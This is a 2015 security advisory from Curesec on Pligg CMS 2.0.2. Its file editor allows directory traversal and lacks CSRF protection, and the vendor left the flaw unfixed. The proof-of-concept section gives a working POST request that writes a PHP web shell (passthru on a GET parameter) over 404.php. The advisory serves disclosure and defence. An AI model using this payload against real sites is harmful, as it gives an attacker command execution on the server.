Pligg CMS 2.0.2: Code Execution and CSRF
Date: 2015-10-07 11:43:071. Introduction
| Affected Product: | Pligg CMS 2.0.2 |
| Fixed in: | not fixed |
| Fixed Version Link: | n/a |
| Vendor Website: | http://pligg.com/ |
| Vulnerability Type: | Code Execution & CSRF |
| Remote Exploitable: | Yes |
| Reported to vendor: | 09/01/2015 |
| Disclosed to public: | 10/07/2015 |
| Release mode: | Full Disclosure |
| CVE: | n/a |
| Credits | Tim Coen of Curesec GmbH |
2. Vulnerability Description
The file editor provides the possibility to edit .tpl files stored in the templates directory.
But the file editor is vulnerable to directory traversal when saving files, and it does not check the submitted filename against a whitelist of allowed files. It also does not check the file extension. Because of this, it is possible to gain code execution.
Admin credentials are required to access the file editor, but the request does not have CSRF protection, so an attacker can gain code execution by getting the admin to visit a website they control while logged in.
3. Proof of Concept
POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1
the_file2=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Fpligg-cms-master%2F404.php&updatedfile=<?php passthru($_GET['x']); ?>&isempty=1&save=Save+Changes
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
| 09/01/2015 | Informed Vendor about Issue (no reply) |
| 09/22/2015 | Reminded Vendor of disclosure date |
| 09/22/2015 | Vendor replied, issue has been send to staff |
| 09/29/2015 | Reminded Vendor of disclosure date (no reply) |
| 10/07/2015 | Disclosed to public |